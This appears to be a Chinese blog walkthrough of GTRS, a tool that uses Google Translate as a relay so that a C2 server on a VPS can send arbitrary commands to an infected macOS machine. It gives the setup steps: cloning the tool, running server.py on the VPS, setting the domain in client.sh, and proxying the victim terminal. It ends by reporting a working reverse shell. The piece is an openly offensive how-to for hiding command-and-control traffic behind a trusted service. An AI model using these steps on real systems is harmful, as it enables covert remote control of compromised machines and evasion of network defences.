GTRS-使用Google Translator作为代理,向受感染的计算机发送任意命令


使用Google Translator作为代理,向受感染的计算机发送任意命令
受感染机器 ==HTTPS==>【Google Translator】==HTTP==>【C2】
在灰炮技能知识星球看到,遂实践之。

前提条件

需要一个VPS和一个域名,并绑定域名和VPS的公网ip。
免费域名可从freenom获取

如果受感染机器在国内,还需要保证其能访问https://translate.google.com/。 后文会介绍mac下终端走代理的方式。

GTRS实现过程

环境:

受感染机器: macOS
C2server: centos6/VPS

第一步:在VPS上执行server.py

[root@host ~]# git clone https://github.com/mthbernardes/GTRS
[root@host ~]# cd GTRS

avatar

此处需要用python2.7执行server.py,但是我的VPS的centos6,默认是python2.6,因此需在centos6上安装python2.7,我安装的是python2.7.15,参考的是秋水逸冰前辈的教程

安装好后,执行server.py:

[root@host GTRS]# python2.7 server.py

avatar

第二步:在受感染机器执行client.sh

执行前,需要先在client.sh的第5行设置域名。

avatar

因为我假设受感染机器是国内的mac,此处要使其能访问https://translate.google.com/, 需要做以下设置:
以zsh为例,(mac下zsh使用的教程 >>> 教程1 | 教程2)

➜  ~ vim ~/.zshrc

添加如下代理配置:

alias proxy=’export all_proxy=socks5://127.0.0.1:1080’
alias unproxy=’unset all_proxy’

avatar

:wq保存退出

➜  ~ source ~/.zshrc

查看当前ip:

➜  ~ curl cip.cc 

avatar

开启shadowssocks,绑定本地1080端口,并执行以下命令:

➜  ~ proxy

再次查看当前ip:

➜  ~ curl cip.cc 

avatar

mac终端走代理成功,此时执行client.sh,成功获取反向shell

➜  GTRS git:(master) ✗ bash client.sh

avatar